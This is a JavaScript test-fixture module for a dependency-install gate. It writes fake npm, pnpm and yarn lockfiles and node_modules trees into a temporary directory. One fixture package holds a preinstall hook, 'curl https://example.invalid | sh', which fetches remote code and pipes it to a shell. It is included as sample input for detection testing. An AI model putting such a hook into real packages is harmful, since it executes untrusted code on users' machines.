// Fixture trees are described here and materialised into a temp directory at test time.
//
// Nothing under a node_modules directory is committed. The repo carries the description of a
// tree, and the builder writes the tree, so the tests exercise the real filesystem walk without
// a dependency tree ever entering git history.

import fs from "node:fs";
import os from "node:os";
import path from "node:path";

/** Packages used across the fixtures. The scripts and licenses mirror shapes seen on real trees. */
export const PACKAGES = {
  "left-pad@1.3.0": { license: "MIT" },
  "ansi-styles@6.2.1": { license: "MIT" },
  "esbuild@0.25.0": { license: "MIT", scripts: { postinstall: "node install.js" } },
  "sharp@0.34.5": { license: "Apache-2.0", scripts: { install: "node install/check.js" } },
  "node-sass@9.0.0": { license: "MIT", scripts: { install: "node scripts/build.js" } },
  "creepy@0.0.1": { license: "MIT", scripts: { preinstall: "curl https://example.invalid | sh" } },
  "axe-core@4.11.1": { license: "MPL-2.0" },
  "gpl-thing@2.0.0": { license: "GPL-3.0-only" },
  "agpl-thing@1.0.0": { license: "AGPL-3.0-or-later" },
  "dual-thing@1.0.0": { license: "(MPL-2.0 OR Apache-2.0)" },
  "and-thing@1.0.0": { license: "Apache-2.0 AND LGPL-3.0-or-later" },
  "fonty@1.7.0": { license: "SIL OPEN FONT LICENSE" },
  "nolicense@0.0.3": {},
  "lowercase-or@1.0.0": { license: "(MIT or Apache-2.0)" },
};

function split(key) {
  const at = key.lastIndexOf("@");
  return { name: key.slice(0, at), version: key.slice(at + 1) };
}

/**
 * Write an npm lockfileVersion 3 document.
 * @param {string[]} keys package keys
 * @param {object} opts { lie } names whose hasInstallScript should be written wrongly, which
 *   is how the source-disagreement path gets exercised
 */
export function npmLock(keys, opts = {}) {
  const packages = { "": { name: "fixture", version: "1.0.0" } };
  for (const key of keys) {
    const { name, version } = split(key);
    const spec = PACKAGES[key];
    if (!spec) throw new Error(`fixture has no package ${key}`);
    const ent = {
      version,
      resolved: `https://registry.npmjs.org/${name}/-/${name}-${version}.tgz`,
      integrity: `sha512-fixture${name}`,
    };
    const real = Boolean(spec.scripts);
    const claimed = opts.lie && opts.lie[name] !== undefined ? opts.lie[name] : real;
    if (claimed) ent.hasInstallScript = true;
    if (spec.license !== undefined) ent.license = spec.license;
    packages[`node_modules/${name}`] = ent;
  }
  return JSON.stringify({ name: "fixture", lockfileVersion: 3, requires: true, packages }, null, 2);
}

export function pnpmLock(keys) {
  const lines = ["lockfileVersion: '9.0'", "", "settings:", "  autoInstallPeers: true", "", "packages:", ""];
  for (const key of keys) {
    const { name, version } = split(key);
    lines.push(`  '${name}@${version}':`);
    lines.push(`    resolution: {integrity: sha512-fixture${name}}`);
    lines.push("");
  }
  lines.push("snapshots:", "");
  for (const key of keys) {
    const { name, version } = split(key);
    lines.push(`  '${name}@${version}': {}`);
  }
  return `${lines.join("\n")}\n`;
}

export function yarnLock(keys) {
  const out = ["# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.", "# yarn lockfile v1", "", ""];
  for (const key of keys) {
    const { name, version } = split(key);
    out.push(`"${name}@^${version}":`);
    out.push(`  version "${version}"`);
    out.push(`  resolved "https://registry.yarnpkg.com/${name}/-/${name}-${version}.tgz#abc"`);
    out.push(`  integrity sha512-fixture${name}`);
    out.push("");
  }
  return out.join("\n");
}

/**
 * Materialise a project directory.
 * @param {object} spec { lockfile: {name, text}, installed: string[], layout: 'flat'|'pnpm'|'nested' }
 * @returns {string} the directory
 */
export function buildTree(spec) {
  const dir = fs.mkdtempSync(path.join(os.tmpdir(), "install-gate-fixture-"));
  if (spec.lockfile) {
    fs.writeFileSync(path.join(dir, spec.lockfile.name), spec.lockfile.text);
  }
  if (spec.config) {
    fs.writeFileSync(path.join(dir, ".install-gate.json"), JSON.stringify(spec.config, null, 2));
  }
  for (const key of spec.installed || []) {
    const { name, version } = split(key);
    const s = PACKAGES[key];
    if (!s) throw new Error(`fixture has no package ${key}`);
    let target;
    if (spec.layout === "pnpm") {
      target = path.join(dir, "node_modules", ".pnpm", `${name}@${version}`, "node_modules", name);
    } else if (spec.layout === "nested") {
      target = path.join(dir, "node_modules", "host", "node_modules", name);
    } else {
      target = path.join(dir, "node_modules", name);
    }
    fs.mkdirSync(target, { recursive: true });
    const doc = { name, version };
    if (s.license !== undefined) doc.license = s.license;
    if (s.scripts) doc.scripts = s.scripts;
    fs.writeFileSync(path.join(target, "package.json"), JSON.stringify(doc, null, 2));
  }
  if (spec.layout === "nested") {
    const host = path.join(dir, "node_modules", "host");
    fs.mkdirSync(host, { recursive: true });
    fs.writeFileSync(
      path.join(host, "package.json"),
      JSON.stringify({ name: "host", version: "1.0.0", license: "MIT" }, null, 2)
    );
  }
  return dir;
}

export function rm(dir) {
  fs.rmSync(dir, { recursive: true, force: true });
}
